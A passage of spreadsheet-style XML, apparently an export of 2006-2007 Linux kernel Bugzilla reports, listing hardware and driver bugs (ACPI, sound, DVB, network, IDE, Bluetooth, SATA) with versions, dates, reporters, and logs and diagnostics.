    <t>2006-12-26 12:32 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.18 Distribution: Gentoo Linux 2006.1 Hardware Environment: Notebook Mitac 8375 Software Environment: console Problem Description: when the battery is charging, the level reported is completely weird like 819%. Steps to reproduce: compile 2.6.19-rc1 and above linux kernel, try to discharge the battery and initiate after a charge.</t>
  </si>
  <si>
    <t>snd-atiixp driver does not load on DFI rs482 mainboard</t>
  </si>
  <si>
    <t>2006-11-07 11:57 UTC</t>
  </si>
  <si>
    <t>2007-03-08 01:24 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: unknown (booted 2.6.17/Debian-amd64, 2.6.18/Debian-amd64, 2.6.19-rc4/own-amd64, 2.6.19-rc4/own-i386) Distribution: Debian 'sid' amd64 (now), i386 (first) Hardware Environment: DFI RS482 mainboard, Athlon64 3200+ Software Environment: Debian 'sid' + selfmade kernel Problem Description: Loading 'snd-atiixp' kernel module gives: ----------------------------------------------------------- atiixp: codec read timeout (reg 0) atiixp: codec read timeout (reg 3c) atiixp: codec read timeout (reg 1c) AC'97 2 does not respond - RESET AC'97 2 access is not valid [0xffffffff], removing mixer. atiixp: no codec available ACPI: PCI interrupt for device 0000:00:14.5 disabled ----------------------------------------------------------- 'codec read timeout' lines are repeating many times. Due to https://bugtrack.alsa-project.org/alsa-bug/view.php?id=2081 it is ACPI problem. I tried pci=noacpi, acpi=off, pci=routeirq, irqpoll (last one was needed to get NIC working with i386 kernel) - each time same results. Steps to reproduce: Boot kernel, modprobe snd-atiixp module.</t>
  </si>
  <si>
    <t>acpi makes x server start hang</t>
  </si>
  <si>
    <t>2.6.18.2</t>
  </si>
  <si>
    <t>2006-11-07 23:26 UTC</t>
  </si>
  <si>
    <t>Oswald Buddenhagen</t>
  </si>
  <si>
    <t>2006-11-30 22:27 UTC</t>
  </si>
  <si>
    <t>acpi_power-video</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.17.&lt;last&gt; Distribution: debian unstable Hardware Environment: ASUS P4GE-V board (i845G), p4 2.4GHz, 1G RAM Software Environment: xorg 7.1.1, xserver-xorg-video-i810 1.7.2 Problem Description: now this is really a weird one. the X server hangs (with ca. 50% CPU) during the initial mode switch. but this happens *only* when the computer powered on itself via rtc alarm - using the power switch or power-on via keyboard does not trigger it. after recovery via hitting the reset switch it doesn't happen, either. booting with acpi=off makes the problem go away. it is 100% reproducible. Steps to reproduce: nvram-wakeup --settime `date +%s -d +1min` halt i assume one can simply boot into the bios, configure an alarm wakeup, reboot and hit the power switch ...</t>
  </si>
  <si>
    <t>(patch queued) DVB-T Pluto2: Getting tons of "card hung up :(" messages when card is removed from pcmcia slot</t>
  </si>
  <si>
    <t>2.6.29rc</t>
  </si>
  <si>
    <t>2006-11-08 12:49 UTC</t>
  </si>
  <si>
    <t>2009-06-02 12:42 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian Testing Hardware Environment: Acer TravelMate Software Environment: Problem Description: pluto2 0000:02:00.0: card hung up :( pccard: card ejected from slot 0 ^^^^^^^^^^^ here should we stop getting card hung up message but we still get it: pluto2 0000:02:00.0: card hung up :( pluto2 0000:02:00.0: card hung up :( pluto2 0000:02:00.0: card hung up :( pluto2 0000:02:00.0: card hung up :( ACPI: PCI interrupt for device 0000:02:00.0 disabled Steps to reproduce: Plug card in and remove</t>
  </si>
  <si>
    <t>DVB-T Pluto2: Hi CPU Load when using card</t>
  </si>
  <si>
    <t>2.6.20</t>
  </si>
  <si>
    <t>2006-11-08 12:56 UTC</t>
  </si>
  <si>
    <t>2007-04-29 05:07 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Distribution: Debian Testing Hardware Environment: Acer TravelMate Software Environment: Kaffeine, MPlayer Problem Description: When card is plugged in, load getts to 2.5 from 0.2, when start playing strem, load getts up to 4 Steps to reproduce: Plug card and start watching movie</t>
  </si>
  <si>
    <t>[CHECKER] amso1100: null pointer dereference</t>
  </si>
  <si>
    <t>Infiniband/RDMA</t>
  </si>
  <si>
    <t>2.6.19-rc5</t>
  </si>
  <si>
    <t>2006-11-09 16:03 UTC</t>
  </si>
  <si>
    <t>2008-09-22 09:15 UTC</t>
  </si>
  <si>
    <t>Tom Tucker</t>
  </si>
  <si>
    <t>This is a checker-found bug. In c2_intr.c:handle_vq, the variable reply_msg can be NULL (line 152), but is dereferenced unconditionally (line 177).</t>
  </si>
  <si>
    <t>(net sundance) driver fails to recognize carrier status</t>
  </si>
  <si>
    <t>2.6.19-rc5/2.6.18.x</t>
  </si>
  <si>
    <t>2006-11-10 08:18 UTC</t>
  </si>
  <si>
    <t>Dan Nicholson</t>
  </si>
  <si>
    <t>2009-03-18 08:51 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Don't know. Only began checking on 2.6.17, and it didn't work there. Distribution: Linux from Scratch Hardware Environment: PIII 500. $ lspci 00:00.0 Host bridge: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX Host bridge (rev 03) 00:01.0 PCI bridge: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX AGP bridge (rev 03) 00:07.0 ISA bridge: Intel Corporation 82371AB/EB/MB PIIX4 ISA (rev 02) 00:07.1 IDE interface: Intel Corporation 82371AB/EB/MB PIIX4 IDE (rev 01) 00:07.2 USB Controller: Intel Corporation 82371AB/EB/MB PIIX4 USB (rev 01) 00:07.3 Bridge: Intel Corporation 82371AB/EB/MB PIIX4 ACPI (rev 02) 00:0c.0 Multimedia audio controller: Yamaha Corporation YMF-724F [DS-1 Audio Controller] (rev 03) 00:0e.0 USB Controller: NEC Corporation USB (rev 43) 00:0e.1 USB Controller: NEC Corporation USB (rev 43) 00:0e.2 USB Controller: NEC Corporation USB 2.0 (rev 04) 00:0f.0 Ethernet controller: D-Link System Inc DL10050 Sundance Ethernet (rev 12) 00:10.0 Serial controller: 3Com Corp, Modem Division 56K FaxModem Model 5610 (rev 01) 01:00.0 VGA compatible controller: ATI Technologies Inc RV280 [Radeon 9200 PRO] (rev 01) 01:00.1 Display controller: ATI Technologies Inc RV280 [Radeon 9200 PRO] (Secondary) (rev 01) Software Environment: Linux silky 2.6.18.1-1 #1 PREEMPT Wed Oct 18 18:04:39 PDT 2006 i686 pentium3 i386 GNU/Linux Gnu C 4.0.3 Gnu make 3.80 binutils 2.16.1 util-linux 2.12r mount 2.12r module-init-tools 3.2.2 e2fsprogs 1.38 Linux C Library 2.3.6 Dynamic linker (ldd) 2.3.6 Linux C++ Library 6.0.7 Procps 3.2.6 Net-tools 1.60 Kbd 1.12 Sh-utils 5.94 udev 096 Modules Loaded radeon drm ipv6 ipt_REJECT xt_tcpudp iptable_nat ip_nat ipt_LOG xt_state ip_conntrack_ftp ip_conntrack nfnetlink iptable_filter ip_tables x_tables binfmt_misc nls_iso8859_1 nls_cp437 vfat fat joydev usbhid usblp snd_ymfpci gameport snd_ac97_codec snd_ac97_bus snd_pcm_oss snd_mixer_oss snd_pcm snd_opl3_lib snd_timer snd_hwdep snd_page_alloc snd_mpu401_uart snd_rawmidi snd_seq_device evdev snd sundance intel_agp soundcore agpgart ehci_hcd mii uhci_hcd ohci_hcd dm_crypt dm_mod fuse Problem Description: Using the D-Link 550-TX with the sundance driver fails to change the carrier status when plugging/unplugging network cable. Some userspace stats: # cat /sys/class/net/eth0/carrier 1 # ip link show eth0 2: eth0: &lt;BROADCAST,MULTICAST,NOTRAILERS,UP,10000&gt; mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:05:5d:e5:ae:08 brd ff:ff:ff:ff:ff:ff # ifconfig eth0 eth0 Link encap:Ethernet HWaddr 00:05:5D:E5:AE:08 inet addr:192.168.1.2 Bcast:192.168.1.255 Mask:255.255.255.0 UP BROADCAST NOTRAILERS RUNNING MULTICAST MTU:1500 Metric:1 RX packets:2 errors:0 dropped:0 overruns:0 frame:0 TX packets:44 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:608 (608.0 b) TX bytes:7777 (7.5 Kb) Interrupt:10 Base address:0x1000 # grep . /sys/class/net/eth0/* /sys/class/net/eth0/address:00:05:5d:e5:ae:08 /sys/class/net/eth0/addr_len:6 /sys/class/net/eth0/broadcast:ff:ff:ff:ff:ff:ff /sys/class/net/eth0/carrier:1 /sys/class/net/eth0/dormant:0 /sys/class/net/eth0/features:0x0 /sys/class/net/eth0/flags:0x1023 /sys/class/net/eth0/ifindex:2 /sys/class/net/eth0/iflink:2 /sys/class/net/eth0/link_mode:0 /sys/class/net/eth0/mtu:1500 /sys/class/net/eth0/operstate:unknown /sys/class/net/eth0/tx_queue_len:1000 /sys/class/net/eth0/type:1 grep: /sys/class/net/eth0/uevent: Permission denied /sys/class/net/eth0/weight:0 These are all exactly the same when the cable is unplugged. Steps to reproduce: Bring up network interface, unplug cable. Carrier status doesn't change.</t>
  </si>
  <si>
    <t>sata ports abnormal status upon boot</t>
  </si>
  <si>
    <t>2006-11-10 15:11 UTC</t>
  </si>
  <si>
    <t>millr4</t>
  </si>
  <si>
    <t>2007-08-08 20:28 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:(have not had this motherboard that long) Distribution:vanilla kernel downloaded from kernel.org 2.6.18.2 Hardware Environment:1686 nvidia mcp55 ultra amd am2 dual core in smp mode Software Environment:sata_nv driver,libata (slackware linux) Problem Description:sata ports echoing abnormal status upon boot Steps to reproduce:compile,install boot</t>
  </si>
  <si>
    <t>2nd IDE channel unusable with via82cxxx</t>
  </si>
  <si>
    <t>2006-11-10 15:51 UTC</t>
  </si>
  <si>
    <t>Daniel Paschka</t>
  </si>
  <si>
    <t>2007-07-05 15:33 UTC</t>
  </si>
  <si>
    <t>The problem first uccurred with 2.6.18-rc5 (rc4 was ok), it's still there with 2.6.19-rc5. It's an older motherboard, lspci shows IDE interface: VIA Technologies, Inc. VT82C586A/B/VT82C686/A/B/VT823x/A/ C PIPC Bus Master IDE (rev 06) (prog-if 8a [Master SecP PriP]) Problem Description: While booting shortly after the drives are detected I get irq 15: nobody cared (try booting with the "irqpoll" option) [&lt;c012cd96&gt;] __report_bad_irq+0x36/0x7d [&lt;c012cf62&gt;] note_interrupt+0x185/0x1c3 [&lt;c012d633&gt;] handle_level_irq+0x8b/0xb4 [&lt;c0104587&gt;] do_IRQ+0x68/0x81 [&lt;c010458c&gt;] do_IRQ+0x6d/0x81 [&lt;c0102cda&gt;] common_interrupt+0x1a/0x20 [&lt;c0102a30&gt;] system_call+0x0/0x29 ======================= handlers: [&lt;c0229510&gt;] (ide_intr+0x0/0x189) Disabling IRQ #15 Access to my drive at hdc will then result in a "lost interrupt" message and the access failing. /proc/interrupts shows around 100000 interrupts on line 15 directly after booting. Running with irqpoll seems to work even though IRQ #15 gets deactivated.</t>
  </si>
  <si>
    <t>Renicing mencoder to something lower than 0 causes the (whole!) system to stuck (cx88 chipset)</t>
  </si>
  <si>
    <t>cx88</t>
  </si>
  <si>
    <t>2.6.17.1, 2.6.19-rc5</t>
  </si>
  <si>
    <t>2006-11-11 03:47 UTC</t>
  </si>
  <si>
    <t>Wiesner Thomas</t>
  </si>
  <si>
    <t>2009-03-18 08:52 UTC</t>
  </si>
  <si>
    <t>v4l-dvb_cx88</t>
  </si>
  <si>
    <t>I've got an strange problem with mencoder from mplayer 1.0pre8 here (selfcompiled, linux kernel 2.6.17.1). (On suggestion of Andrew Morton I've tested 2.6.19-rc5 lately and the problem is still present). Running just mencoder to record from my TV card (cx88 chipset) works fine. The card is a Hauppauge WinTV PCI-FM. But when I renice it to a negative priority (-1 is enough to trigger it), the whole system (even all the linux text terminals with no X running) gets unresponsive and stucks every second or so for about a 0.5 seconds and mencoder drops more frames than before than without renicing. mencoder uses about 80% CPU but the problem occurs on "only" 60% CPU usage too. I tested an "endless loop program" if this is a general renicing problem, but it isn't, I would need to renice an endless loop to something below about -10 to cause a stucking mencoder creates at only -1. Googling around didn't lead to any useful results, I've asked in #mplayer and #kernel but no one knew an answer. Someone in #mplayerdev suggested it's likely a kernel bug and Andrew Morton told me to file a bug report if it's still present in 2.6.19-rc5, causing me to write this report. If I renice mencoder to a positive value it works better than than to a negative and doesn't cause the system to stuck. (This leads me to not touching the priority at all but there must be a problem somwhere because everything stucks terribly. Of course, renicing to a positive value makes no sense because I would drop frames if the system load goes up due to other processes. What I want to point out, that if I renice it to +1 it works _better_ than renicing it to -1, because it starts to drop frames immediately if I renice it to something lower than 0 even if the system load is only about 60%.) ------------------------------------------------------------------------------ System information: Mencoder output: MEncoder 1.0pre8-3.3.5 (C) 2000-2006 MPlayer Team CPU: AMD Athlon(tm) XP 3200+ (Family: 6, Model: 10, Stepping: 0) CPUflags: Type: 6 MMX: 1 MMX2: 1 3DNow: 1 3DNow2: 1 SSE: 1 SSE2: 0 Compiled for x86 CPU with extensions: MMX MMX2 3DNow 3DNowEx SSE (Compiled with xvid and lame support) uname -a output: Linux barton 2.6.17.1v4l #2 Mon Aug 21 20:47:56 CEST 2006 i686 GNU/Linux lspci -v output (TV card section): 0000:01:0a.0 Multimedia video controller: Conexant Winfast TV2000 XP (rev 05) Subsystem: Hauppauge computer works Inc.: Unknown device 3401 Flags: bus master, medium devsel, latency 32, IRQ 20 Memory at e7000000 (32-bit, non-prefetchable) [size=16M] Capabilities: [44] Vital Product Data Capabilities: [4c] Power Management version 2 Lame version 3.96.1 (compiled from source) xvidcore version: 1.1.0 (compiled from source) ffmpeg version: cvs20060823 with debian patch (ffmpeg_0.cvs20060823-3.diff) (compiled from source) /proc/cpuinfo: processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 10 model name : AMD Athlon(tm) XP 3200+ stepping : 0 cpu MHz : 2194.412 cache size : 512 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse syscall mmxext 3dnowext 3dnow up ts bogomips : 4393.35</t>
  </si>
  <si>
    <t>DVB-S card doesn't lock channel</t>
  </si>
  <si>
    <t>2006-11-11 16:38 UTC</t>
  </si>
  <si>
    <t>2006-11-16 13:28 UTC</t>
  </si>
  <si>
    <t>Andrew de Quincey</t>
  </si>
  <si>
    <t>The problem occoured with the patch from 2.6.18-rc2 to -rc3 and is still in 2.6.19-rc5. Hardware: 00:11.0 Multimedia controller: Philips Semiconductors SAA7146 (rev 01) Subsystem: Technotrend Systemtechnik GmbH Technotrend-Budget / Hauppauge WinTV-NOVA-S DVB card 00:11.0 Class 0480: 1131:7146 (rev 01) Subsystem: 13c2:1003 Flags: bus master, medium devsel, latency 64, IRQ 10 Memory at e6000000 (32-bit, non-prefetchable) [size=512] Problem Description: Some channels don't lock. I am not certain, but I think it are the channels with horizontal polarization which don't work. going through the patchset I found that reverting the following part of the patch fixes my problems (applies to 2.6.19-rc5 with a litte offset): diff --git a/drivers/media/dvb/ttpci/budget.c b/drivers/media/dvb/ttpci/budget.c --- a/drivers/media/dvb/ttpci/budget.c +++ b/drivers/media/dvb/ttpci/budget.c @@ -375,9 +375,6 @@ static void frontend_init(struct budget if (budget-&gt;dvb_frontend) { budget-&gt;dvb_frontend-&gt;ops.tuner_ops.set_params = alps_bsru6_tuner_set_params; budget-&gt;dvb_frontend-&gt;tuner_priv = &amp;budget-&gt;i2c_adap; - budget-&gt;dvb_frontend-&gt;ops.diseqc_send_master_cmd = budget_diseqc_send_master_cmd; - budget-&gt;dvb_frontend-&gt;ops.diseqc_send_burst = budget_diseqc_send_burst; - budget-&gt;dvb_frontend-&gt;ops.set_tone = budget_set_tone; break; } break;</t>
  </si>
  <si>
    <t>S3 resume hang - Toshiba Portege 4000</t>
  </si>
  <si>
    <t>2.6.20-git</t>
  </si>
  <si>
    <t>2006-11-12 04:14 UTC</t>
  </si>
  <si>
    <t>Andrey Borzenkov</t>
  </si>
  <si>
    <t>2009-03-31 22:12 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: Can't tell exactly. I have tried STR since about 2.6.15 and it "mostly worked" with intermittent lockups. Since 2.8.18 this almost never works - I am unable to safely resume more than once if ever; this has been reproduced on 2.6.19-rc5 as well. Distribution: Mandriva cooker (post 2007) Hardware Environment: Toshiba Portege 4000; detailed hardware information attached Software Environment: Vanilla kernel 2.6.19-rc5 compiled with gcc-4.1.1. config attached. suspend-scripts from Mandriva (set of scripts to run on suspend/resume) Problem Description: System stays dead on resume from STR; on display the output of previous suspend can be seen, nothing more. The only way out is power button. Steps to reproduce: Try to suspend to RAM several times. Since 2.6.18 it never worked more than once. Once (under 2.6.18) I was able to capture screen output; see also http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=115989508210686&amp;w=2. I am unable to get any output under 2.6.19-rc5 unfortunately. The bug looks similar to bug 6749, but I do not have hardware EC (as long as I can believe dmesg output). I am also able to reproduce this problem booting with init=/bin/sh with the following minimal module set loaded: Module Size Used by reiserfs 262764 1 ide_disk 17024 2 alim15x3 12428 0 [permanent] ide_core 120516 2 ide_disk,alim15x3 atkbd 18488 0 libps2 7496 1 atkbd i8042 20152 0 serio 18520 4 atkbd,i8042</t>
  </si>
  <si>
    <t>sunhme not working with 2.6.18 on x86</t>
  </si>
  <si>
    <t>2006-11-12 16:47 UTC</t>
  </si>
  <si>
    <t>Jasmin Buchert</t>
  </si>
  <si>
    <t>2007-01-02 13:25 UTC</t>
  </si>
  <si>
    <t>Since Kernel 2.6.18 sunhme gives me a "irq nobody cared" and transmit timeouts. 2.6.17 worked fine. The NIC is a Sun HappyMeal Quad-Port and my architecture is x86. The same problem is described at http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=397460 and it seems the problem is introduced by http://www.kernel.org/git/?p=linux/kernel/git/stable/linux-2.6.18.y.git;a=commit;h=050bbb196392b9c178f82b1205a23dd2f915ee93 Relevant dmesg part: Oct 27 01:12:27 merkur eth0: Link is up using internal transceiver at 100Mb/s, Full Duplex. Oct 27 01:12:29 merkur irq 19: nobody cared (try booting with the "irqpoll" option) Oct 27 01:12:29 merkur handlers: Oct 27 01:12:29 merkur [&lt;0031333e&gt;] (0x31333e) Oct 27 01:12:29 merkur Disabling IRQ #19 Oct 27 01:12:32 merkur eth1: Link is up using internal transceiver at 100Mb/s, Full Duplex. Oct 27 01:14:03 merkur NETDEV WATCHDOG: eth1: transmit timed out Oct 27 01:14:03 merkur eth1: transmit timed out, resetting Oct 27 01:14:03 merkur eth1: Happy Status 03030000 TX[000003ff:00000301]</t>
  </si>
  <si>
    <t>Linux-2.6.18 fails to boot on AMD64 machine</t>
  </si>
  <si>
    <t>2.6.18, 2.6.18.1, 2.6.18.2, 2.6.19-rc1, 2.6.19-rc5</t>
  </si>
  <si>
    <t>2006-11-12 21:49 UTC</t>
  </si>
  <si>
    <t>Alexander Galanin</t>
  </si>
  <si>
    <t>2007-01-09 19:25 UTC</t>
  </si>
  <si>
    <t>Bluetooth related panic</t>
  </si>
  <si>
    <t>2.6.22-rc5</t>
  </si>
  <si>
    <t>2006-11-13 02:06 UTC</t>
  </si>
  <si>
    <t>Mikko Rapeli</t>
  </si>
  <si>
    <t>2007-07-17 14:01 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: didn't find any (tried 2.6.16.32, 2.6.18.1 and Debian kernel 2.6.17-2) Distribution: Debian etch userspace Hardware Environment: $ lspci 00:00.0 Host bridge: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX Host bridge (rev 03) 00:01.0 PCI bridge: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX AGP bridge (rev 03) 00:02.0 CardBus bridge: Texas Instruments PCI1450 (rev 03) 00:02.1 CardBus bridge: Texas Instruments PCI1450 (rev 03) 00:03.0 Ethernet controller: Intel Corporation 82557/8/9 [Ethernet Pro 100] (rev 09) 00:03.1 Serial controller: Xircom Mini-PCI V.90 56k Modem 00:05.0 Multimedia audio controller: Cirrus Logic CS 4614/22/24 [CrystalClear SoundFusion Audio Accelerator] (rev 01) 00:07.0 Bridge: Intel Corporation 82371AB/EB/MB PIIX4 ISA (rev 02) 00:07.1 IDE interface: Intel Corporation 82371AB/EB/MB PIIX4 IDE (rev 01) 00:07.2 USB Controller: Intel Corporation 82371AB/EB/MB PIIX4 USB (rev 01) 00:07.3 Bridge: Intel Corporation 82371AB/EB/MB PIIX4 ACPI (rev 03) 01:00.0 VGA compatible controller: S3 Inc. 86C270-294 Savage/IX-MV (rev 11) $ lsusb Bus 001 Device 002: ID 0a12:0001 Cambridge Silicon Radio, Ltd Bluetooth Dongle (HCI mode) Bus 001 Device 001: ID 0000:0000 Software Environment: Debian etch userspace Problem Description: Kernel crash like this Nov 8 14:06:00 silu kernel: CPU: 0 Nov 8 14:06:00 silu kernel: EIP: 0060:[phys_startup_32+1700618595/-1073741824] Not tainte d VLI Nov 8 14:06:00 silu kernel: EFLAGS: 00010012 (2.6.18.2 #4) Nov 8 14:06:00 silu kernel: EIP is at 0x656d6163 Nov 8 14:06:00 silu kernel: eax: cdc35f28 ebx: cdc35f28 ecx: 00000000 edx: 00000003 Nov 8 14:06:00 silu kernel: esi: 6c2e6172 edi: 00000001 ebp: c3625c54 esp: c3625c34 Nov 8 14:06:00 silu kernel: ds: 007b es: 007b ss: 0068 Nov 8 14:06:00 silu kernel: Process pppd (pid: 3343, ti=c3624000 task=cdc2e570 task.ti=c3624000 ) Nov 8 14:06:00 silu kernel: Stack: c0116219 00000000 00000003 c77ee938 6b206567 c77ee938 000000 00 00000001 Nov 8 14:06:00 silu kernel: c3625c78 c011666a 00000000 00000000 00000003 00000282 c77ee8 00 00000000 Nov 8 14:06:00 silu kernel: c3625cb8 00000000 c01cb14f 00000000 c1250000 cf44ce00 c3625c b8 00000001 Nov 8 14:06:00 silu kernel: Call Trace: Nov 8 14:06:00 silu kernel: [__wake_up_common+47/83] __wake_up_common+0x2f/0x53 Nov 8 14:06:00 silu kernel: [__wake_up+42/61] __wake_up+0x2a/0x3d Nov 8 14:06:00 silu kernel: [release_dev+569/1518] release_dev+0x239/0x5ee Nov 8 14:06:00 silu kernel: [free_pages_bulk+27/491] free_pages_bulk+0x1b/0x1eb Nov 8 14:06:00 silu kernel: [_spin_lock_bh+8/24] _spin_lock_bh+0x8/0x18 Nov 8 14:06:00 silu kernel: [lock_sock+137/145] lock_sock+0x89/0x91 Nov 8 14:06:00 silu kernel: [lock_sock+137/145] lock_sock+0x89/0x91 Nov 8 14:06:00 silu kernel: [pg0+276501738/1070425088] inet6_destroy_sock+0x22/0x3a [ipv6] Nov 8 14:06:00 silu kernel: [tty_release+15/24] tty_release+0xf/0x18 Nov 8 14:06:00 silu kernel: [__fput+57/216] __fput+0x39/0xd8 Nov 8 14:06:00 silu kernel: [filp_close+78/84] filp_close+0x4e/0x54 Nov 8 14:06:00 silu kernel: [put_files_struct+101/167] put_files_struct+0x65/0xa7 Nov 8 14:06:00 silu kernel: [do_exit+458/1805] do_exit+0x1ca/0x70d Nov 8 14:06:00 silu kernel: [die+482/650] die+0x1e2/0x28a Nov 8 14:06:00 silu kernel: [die+613/650] die+0x265/0x28a Nov 8 14:06:00 silu kernel: [do_page_fault+948/1153] do_page_fault+0x3b4/0x481 Nov 8 14:06:00 silu kernel: [do_page_fault+0/1153] do_page_fault+0x0/0x481 Nov 8 14:06:00 silu kernel: [error_code+57/64] error_code+0x39/0x40 Nov 8 14:06:00 silu kernel: [pg0+276348877/1070425088] rfcomm_tty_chars_in_buffer+0x7/0x2f [rf comm] Nov 8 14:06:00 silu kernel: [tty_wait_until_sent+116/185] tty_wait_until_sent+0x74/0xb9 Nov 8 14:06:00 silu kernel: [default_wake_function+0/12] default_wake_function+0x0/0xc Nov 8 14:06:00 silu kernel: [n_tty_ioctl+0/1037] n_tty_ioctl+0x0/0x40d Nov 8 14:06:00 silu kernel: [set_termios+190/745] set_termios+0xbe/0x2e9 Nov 8 14:06:00 silu kernel: [do_path_lookup+522/549] do_path_lookup+0x20a/0x225 Nov 8 14:06:00 silu kernel: [path_lookup+15/17] path_lookup+0xf/0x11 Nov 8 14:06:00 silu kernel: [n_tty_ioctl+0/1037] n_tty_ioctl+0x0/0x40d Nov 8 14:06:00 silu kernel: [tty_ioctl+2893/2988] tty_ioctl+0xb4d/0xbac Nov 8 14:06:00 silu kernel: [unix_dgram_connect+106/287] unix_dgram_connect+0x6a/0x11f Nov 8 14:06:00 silu kernel: [do_wp_page+299/840] do_wp_page+0x12b/0x348 Nov 8 14:06:00 silu kernel: [__handle_mm_fault+1752/1856] __handle_mm_fault+0x6d8/0x740 Nov 8 14:06:00 silu kernel: [do_ioctl+71/93] do_ioctl+0x47/0x5d Nov 8 14:06:00 silu kernel: [vfs_ioctl+586/604] vfs_ioctl+0x24a/0x25c Nov 8 14:06:00 silu kernel: [do_page_fault+394/1153] do_page_fault+0x18a/0x481 Nov 8 14:06:00 silu kernel: [sys_ioctl+44/67] sys_ioctl+0x2c/0x43 Nov 8 14:06:00 silu kernel: [syscall_call+7/11] syscall_call+0x7/0xb Nov 8 14:06:00 silu kernel: Code: Bad EIP value. Nov 8 14:06:00 silu kernel: EIP: [phys_startup_32+1700618595/-1073741824] 0x656d6163 SS:ESP 006 8:c3625c34 Nov 8 14:06:00 silu kernel: &lt;1&gt;Fixing recursive fault but reboot is needed! Nov 8 14:07:54 silu kernel: SysRq : Emergency Sync Nov 8 14:07:54 silu kernel: Emergency Sync complete Steps to reproduce: Boot to run level 2, login as root on virtual terminal, run screen, open GPRS ppp connection with 'pon gprs-bt', open another shell to ping some host, open a third shell to do 'telinit 1'.</t>
  </si>
  <si>
    <t>Eric Sesterhenn</t>
  </si>
  <si>
    <t>43, 44, 50 &amp; 60 line console modes broken (0x121, 0x122, 0x123, 0x133, 0x154, 0x30a, others)</t>
  </si>
  <si>
    <t>2.6.18.2-4</t>
  </si>
  <si>
    <t>2006-11-13 11:46 UTC</t>
  </si>
  <si>
    <t>Felix Miata</t>
  </si>
  <si>
    <t>2008-07-16 02:53 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.2.x (estimated) Distribution: Debian, Fedora, Knoppix, Mandriva, SUSE, Ubuntu Hardware Environment: i586/i686/K7 standard 4:3 CRT displays ATI Rage *, i810, i815, Matrox G400, NVidia GeForce, S3 Trio Software Environment: everything except X Problem Description: When tty[1-6] config is set to a "supported" (listed after scan with vga=ask) 132 column by &gt;25 row mode on kernel line with vga=ask or (e.g.) vga=0x121, init correctly initializes the mode, but then before init finishes, the number of lines changes to fewer than configured (on i815 with 0x121, switch is to ~21 lines). Programs think that the &gt;25 line mode is in effect, and so output typically shows on unexpected lines rather than the last line, or doesn't show up at all, until after hitting return several times to scroll the screen. Steps to reproduce: 1-set kernel line to (e.g.) vga=0x121 2-boot without GUI splash Note: Even before the change from (e.g.) 43 rows to ~21 rows, for most of these broken modes, a few scan lines from the top and bottom rows are missing. As to how old this bug is, all I can say is I can't remember ever not seeing it since about RedHat 6.2. I seem to hit this often with video cards don't support 788/0x314 or 791/0x317.</t>
  </si>
  <si>
    <t>Promise SATA300 TX4 with WD2500KS: "no sense translation" errors</t>
  </si>
  <si>
    <t>2006-11-13 22:46 UTC</t>
  </si>
  <si>
    <t>Gregory Brauer</t>
  </si>
  <si>
    <t>2008-05-06 04:26 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: none (happens in 2.6.19-rc5, and also all tested FC5 kernels, including 2.6.18-1.2239.fc5smp) Distribution: Fedora Core 5 Hardware Environment: 440BX chipset motherboard Promise SATA300 TX4 controller card WD2500KS and WD2500JD hard drives Software Environment: kernel-2.6.19-rc5 Problem Description: I have a new Promise SATA300 TX4 4-port SATA controller to which I have attached two older WD2500JD hard drives and two brand new WD2500KS hard drives as a RAID-5 md array. The older drives seem to work fine, but both of the brand new hard drivestrigger the following errors every few seconds during i/o, more frequently during writes: Nov 13 22:18:03 gleep kernel: ata1: no sense translation for status: 0x50 Nov 13 22:18:03 gleep kernel: ata1: translated ATA stat/err 0x50/00 to SCSI SK/ASC/ASCQ 0xb/00/00 Nov 13 22:18:03 gleep kernel: ata1: status=0x50 { DriveReady SeekComplete } Nov 13 22:18:14 gleep kernel: ata3: no sense translation for status: 0x50 Nov 13 22:18:14 gleep kernel: ata3: translated ATA stat/err 0x50/00 to SCSI SK/ASC/ASCQ 0xb/00/00 Nov 13 22:18:14 gleep kernel: ata3: status=0x50 { DriveReady SeekComplete } Nov 13 22:18:50 gleep kernel: ata3: no sense translation for status: 0x50 Nov 13 22:18:50 gleep kernel: ata3: translated ATA stat/err 0x50/00 to SCSI SK/ASC/ASCQ 0xb/00/00 Nov 13 22:18:50 gleep kernel: ata3: status=0x50 { DriveReady SeekComplete } Nov 13 22:19:14 gleep kernel: ata1: no sense translation for status: 0x50 Nov 13 22:19:14 gleep kernel: ata1: translated ATA stat/err 0x50/00 to SCSI SK/ASC/ASCQ 0xb/00/00 Nov 13 22:19:14 gleep kernel: ata1: status=0x50 { DriveReady SeekComplete } Nov 13 22:19:25 gleep kernel: ata1: no sense translation for status: 0x50 Nov 13 22:19:25 gleep kernel: ata1: translated ATA stat/err 0x50/00 to SCSI SK/ASC/ASCQ 0xb/00/00 Nov 13 22:19:25 gleep kernel: ata1: status=0x50 { DriveReady SeekComplete } Nov 13 22:19:49 gleep kernel: ata3: no sense translation for status: 0x50 Nov 13 22:19:49 gleep kernel: ata3: translated ATA stat/err 0x50/00 to SCSI SK/ASC/ASCQ 0xb/00/00 Nov 13 22:19:49 gleep kernel: ata3: status=0x50 { DriveReady SeekComplete } Nov 13 22:20:01 gleep kernel: 